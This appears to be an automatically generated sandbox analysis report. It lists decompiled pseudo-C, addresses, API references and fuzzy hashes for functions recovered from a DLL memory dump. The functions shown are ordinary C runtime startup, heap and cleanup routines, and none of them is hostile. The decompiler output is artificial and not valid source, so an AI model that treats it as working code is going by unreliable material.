			E73212A2B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x7322fab8);
				E732131E0(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E73212B36( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E73212821(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_t45 = E732119D0( *((intOrPtr*)(_t47 + 8)), _t42);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_t29 = E732119D0( *((intOrPtr*)(_t47 + 8)), _t26);
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E7321297B(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E73212B36( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E73212821(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E73212B36( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x73231870 - _t42; // 0x1
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

APIs

dllmain_raw.LIBCMT ref: 73212A68
dllmain_crt_dispatch.LIBCMT ref: 73212A7F
dllmain_raw.LIBCMT ref: 73212AC7
dllmain_crt_dispatch.LIBCMT ref: 73212ADA
dllmain_raw.LIBCMT ref: 73212AED

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 4e56da261fa4cac84b54e0b9dc4029fa0c8c76047cbeef67b53c36cba0a88b24
Instruction ID: 30d4e82c4446436a142c8a7eea6ae30259434bfc0cb3e07506c7dbde3a90d709
Opcode Fuzzy Hash: 4e56da261fa4cac84b54e0b9dc4029fa0c8c76047cbeef67b53c36cba0a88b24
Instruction Fuzzy Hash: 74213072E0032FEFDB225E55DA40F6F3AF9EB84A90B054125FC1656250D7719EE18BE0

Uniqueness

Uniqueness Score: -1.00%

Function 73212874, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E73212874(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E732131E0(__ebx, __edi, __esi);
				_t43 = E73212EBE(__ecx, __edx, 0); // executed
				_t90 = 0x7322fa70;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E73212DC3();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x73231bb0;
					if( *0x73231bb0 != 0) {
						E7321305D(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x7322fa90);
						E732131E0(1, __edi, __esi);
						_t48 =  *0x73231870; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x73231870 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E73212DC3();
							 *(_t123 - 4) = 1;
							__eflags =  *0x73231bb0 - 2;
							if( *0x73231bb0 != 2) {
								E7321305D(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x7322fab8);
								E732131E0(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E73212B36( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E73212821(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E732119D0( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E732119D0( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E73212B36( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E73212821(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E73212B36( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x73231870 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E73212E8E(1, _t90, 1, _t113);
								E73212D4A();
								E732131AC();
								 *0x73231bb0 =  *0x73231bb0 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E73212A10();
								_t67 = E7321302F( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E73212A1D();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x73231bb0 = 1;
						if(E73212E20(_t132) != 0) {
							E73212D3E(E73213180());
							E73212D62();
							_t80 = E73214407(0x7321d110, 0x7321d120); // executed
							_pop(_t102);
							if(_t80 == 0 && E73212DF5(1, _t102) != 0) {
								E732143C0(_t102, 0x7321d108, 0x7321d10c);
								 *0x73231bb0 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E73212957();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E73213057();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E73212F7E(_t85, _t106, _t121, _t138) != 0) {
									 *0x7321d104( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x73231870 =  *0x73231870 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

APIs

__RTC_Initialize.LIBCMT ref: 732128C1

Part of subcall function 73212D3E: InitializeSListHead.KERNEL32(73231B98,732128CB,7322FA70,00000010,7321285C,?,?,?,73212A84,?,00000001,?,?,00000001,?,7322FAB8), ref: 73212D43

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 7321292B

Strings

D2!s, xrefs: 73212941

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID: D2!s
API String ID: 3231365870-1464734957
Opcode ID: e8bad83b66a7de20299cd9144ce9c48784f50c44588dd2af7ed969aac16b1b60
Instruction ID: b283fd156556775d6596b585bd2c2fcf3f662eb574342d9d0b69f8834dad5e50
Opcode Fuzzy Hash: e8bad83b66a7de20299cd9144ce9c48784f50c44588dd2af7ed969aac16b1b60
Instruction Fuzzy Hash: 6121D13360834FDBEB00ABB8870479C37F29F05665F244519E8862B1C2DBB250F19A99

Uniqueness

Uniqueness Score: -1.00%

Function 73217E13, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73217E13(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x73232250; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x73232250 = _t9;
				}
				_t10 = E73215BA6(_t9, 4); // executed
				 *0x73232254 = _t10;
				E73215C03(0);
				if( *0x73232254 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x73231648;
					do {
						_t1 = _t31 + 0x20; // 0x73231668
						E732175C2(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x73232254; // 0x2d35fd8
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x73231f50 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x732316f0;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x73232250 = _t30;
					 *0x73232254 = E73215BA6(_t30, 4);
					_t21 = E73215C03(0);
					if( *0x73232254 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x73217e13
0x73217e1b
0x73217e1e
0x73217e27
0x73217e29
0x73217e2b
0x00000000
0x73217e2b
0x73217e20
0x73217e20
0x73217e2d
0x73217e2d
0x73217e2d
0x73217e35
0x73217e3c
0x73217e41
0x73217e50
0x73217e7d
0x73217e7e
0x73217e7e
0x73217e80
0x73217e85
0x73217e8c
0x73217e90
0x73217e95
0x73217e9f
0x73217eb1
0x73217eb5
0x73217eb8
0x73217ec3
0x73217ec3
0x73217eba
0x73217eba
0x73217ebd
0x00000000
0x73217ebf
0x73217ebf
0x73217ec1
0x00000000
0x00000000
0x73217ec1
0x73217ebd
0x73217eca
0x73217ecd
0x73217ece
0x73217ece
0x73217ed7
0x73217eda
0x73217e52
0x73217e55
0x73217e62
0x73217e67
0x73217e76
0x00000000
0x73217e78
0x73217e7c
0x73217e7c
0x73217e76

APIs

_free.LIBCMT ref: 73217E41
_free.LIBCMT ref: 73217E67

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7387eb7441a6461af40087719bada2e617506aa1d0223061524b47fd29f3425b
Instruction ID: 933c79390bd48cbf1409336ba48d10a3eb495f5d2787b19f661cedf79a392971
Opcode Fuzzy Hash: 7387eb7441a6461af40087719bada2e617506aa1d0223061524b47fd29f3425b
Instruction Fuzzy Hash: E511B1A2A0430B4BD321BE2EDE14B0673EDA7C5720F384616E515CA1C0D774DDD696C0

Uniqueness

Uniqueness Score: -1.00%

Function 73214B5C, Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E73214B5C(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x73214b61

APIs

Part of subcall function 73216FE9: GetEnvironmentStringsW.KERNEL32 ref: 73216FF2
Part of subcall function 73216FE9: _free.LIBCMT ref: 73217051
Part of subcall function 73216FE9: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 73217060

_free.LIBCMT ref: 73214B9C
_free.LIBCMT ref: 73214BA3

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$EnvironmentStrings$Free
String ID:
API String ID: 2490078468-0
Opcode ID: 80e85a3621a315aa3a12ed825409fef6d62d66b2d9dc5fd70cf7448994ebf543
Instruction ID: 82f6d33fa92c5bbf389b320e48057d358168a847b6fe2dc4b639f501ff71e10d
Opcode Fuzzy Hash: 80e85a3621a315aa3a12ed825409fef6d62d66b2d9dc5fd70cf7448994ebf543
Instruction Fuzzy Hash: 29E02B67E04A3307F3526E3F7F00B5F16E58F82230B72031BD828D70C0EAA086E20195

Uniqueness

Uniqueness Score: -1.00%

Function 7321901D, Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E7321901D(void* __edi, void* __eflags) {
				intOrPtr _v12;
				char _t17;
				void* _t18;
				intOrPtr* _t32;
				char _t35;
				void* _t37;

				_push(_t27);
				_t17 = E73215BA6(0x40, 0x38); // executed
				_t35 = _t17;
				_v12 = _t35;
				if(_t35 != 0) {
					_t2 = _t35 + 0xe00; // 0xe00
					_t18 = _t2;
					__eflags = _t35 - _t18;
					if(__eflags != 0) {
						_t3 = _t35 + 0x20; // 0x20
						_t32 = _t3;
						_t37 = _t18;
						do {
							_t4 = _t32 - 0x20; // 0x0
							E732175C2(__eflags, _t4, 0xfa0, 0);
							 *(_t32 - 8) =  *(_t32 - 8) | 0xffffffff;
							 *_t32 = 0;
							_t32 = _t32 + 0x38;
							 *((intOrPtr*)(_t32 - 0x34)) = 0;
							 *((intOrPtr*)(_t32 - 0x30)) = 0xa0a0000;
							 *((char*)(_t32 - 0x2c)) = 0xa;
							 *(_t32 - 0x2b) =  *(_t32 - 0x2b) & 0x000000f8;
							 *((intOrPtr*)(_t32 - 0x2a)) = 0;
							 *((char*)(_t32 - 0x26)) = 0;
							__eflags = _t32 - 0x20 - _t37;
						} while (__eflags != 0);
						_t35 = _v12;
					}
				} else {
					_t35 = 0;
				}
				E73215C03(0);
				return _t35;
			}

0x73219023
0x7321902a
0x7321902f
0x73219033
0x7321903a
0x73219040
0x73219040
0x73219046
0x73219048
0x7321904b
0x7321904b
0x7321904e
0x73219050
0x73219056
0x7321905a
0x7321905f
0x73219063
0x73219065
0x73219068
0x7321906e
0x73219075
0x73219079
0x7321907d
0x73219080
0x73219083
0x73219083
0x73219087
0x7321908a
0x7321903c
0x7321903c
0x7321903c
0x7321908c
0x73219099

APIs

Part of subcall function 73215BA6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,732157A5,00000001,00000364,00000007,000000FF,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 73215BE7

_free.LIBCMT ref: 7321908C

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 2bcc8b6353cd1c71f4f318913fe7f205d0146c5ce45364e0147c08b43b6dbee7
Instruction ID: 3d81d4de9b1492983a5540a4aff3c3a388e56eb1715d6ee737992052e77699ce
Opcode Fuzzy Hash: 2bcc8b6353cd1c71f4f318913fe7f205d0146c5ce45364e0147c08b43b6dbee7
Instruction Fuzzy Hash: EF012B72A043176BD321CF58C980B8AFBEDEB45370F240269E459A76C0D7705D60C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 73215BA6, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73215BA6(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x73232230, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E732185CC();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E73215B93(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E732177BF(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x73215bac
0x73215bb1
0x73215bbf
0x73215bbf
0x73215bc5
0x73215bc7
0x73215bc7
0x73215bde
0x73215be7
0x73215bef
0x00000000
0x00000000
0x73215bcf
0x73215bd1
0x73215bf3
0x73215bf8
0x73215bfe
0x00000000
0x73215bfe
0x73215bda
0x73215bdc
0x00000000
0x00000000
0x73215bdc
0x00000000
0x73215bde
0x73215bb7
0x73215bbd
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,732157A5,00000001,00000364,00000007,000000FF,?,00000001,73215B98,73215C29,?,?,73214E53), ref: 73215BE7

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7989e2da8f404927fe33fda7ef946e5b8238ce461bb3dc15b293cd05f589f356
Instruction ID: c9ea05b4a0989859ea1d62dd9829e763eb66f6ed447d3ab69edae039bc3352d5
Opcode Fuzzy Hash: 7989e2da8f404927fe33fda7ef946e5b8238ce461bb3dc15b293cd05f589f356
Instruction Fuzzy Hash: 62F0BB7250522767D7111A2E9F04F4B37D8EF40660B3940A2DC06961CCCF70DAA185E0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 7321305D, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E7321305D(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E73213178(_t34);
				 *_t60 = 0x2cc;
				_v632 = E73213750(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E73213750(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E73213178(_t49);
				}
				return _t49;
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 73213069
IsDebuggerPresent.KERNEL32 ref: 73213135
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73213155
UnhandledExceptionFilter.KERNEL32(?), ref: 7321315F

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912242033.000000007321D000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.912356560.0000000073231000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.912376187.0000000073233000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: e0e5a9e0e3b4f2b36c1e9f172a39df81c896663814d5702c658d33f05da0ccce
Instruction ID: f807914f0e05d5de17a6420d8ff32266ebfa7706c93f5a6ba21920d760d272ba
Opcode Fuzzy Hash: e0e5a9e0e3b4f2b36c1e9f172a39df81c896663814d5702c658d33f05da0ccce
Instruction Fuzzy Hash: 16311A76D05319EBDB11DF64CA897CDBBF8AF04700F10409AE50DA7250EB715B859F44

Uniqueness

Uniqueness Score: -1.00%

Function 732182B7, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E732182B7(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x732316f8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E73215C03(_t46);
							E7321A1E9( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E73215C03(_t47);
							E7321A2E7( *((intOrPtr*)(_t74 + 0x88)));
						}
						E73215C03( *((intOrPtr*)(_t74 + 0x7c)));
						E73215C03( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E73215C03( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E73215C03( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E73215C03( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E73215C03( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E7321842A( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x73231640) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E73215C03(_t31);
							E73215C03( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe87
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E73215C03(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E73215C03(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 732182FB

Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A206
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A218
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A22A
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A23C
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A24E
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A260
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A272
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A284
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A296
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2A8
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2BA
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2CC
Part of subcall function 7321A1E9: _free.LIBCMT ref: 7321A2DE

_free.LIBCMT ref: 732182F0

Part of subcall function 73215C03: HeapFree.KERNEL32(00000000,00000000,?,73214E53), ref: 73215C19
Part of subcall function 73215C03: GetLastError.KERNEL32(?,?,73214E53), ref: 73215C2B

_free.LIBCMT ref: 73218312
_free.LIBCMT ref: 73218327
_free.LIBCMT ref: 73218332
_free.LIBCMT ref: 73218354
_free.LIBCMT ref: 73218367
_free.LIBCMT ref: 73218375
_free.LIBCMT ref: 73218380
_free.LIBCMT ref: 732183B8
_free.LIBCMT ref: 732183BF
_free.LIBCMT ref: 732183DC
_free.LIBCMT ref: 732183F4

Memory Dump Source

Source File: 00000002.00000002.912164912.0000000073211000.00000020.00020000.sdmp, Offset: 73210000, based on PE: true

Associated: 00000002.00000002.912148247.0000000073210000.00000002.00020000.sdmp Download File
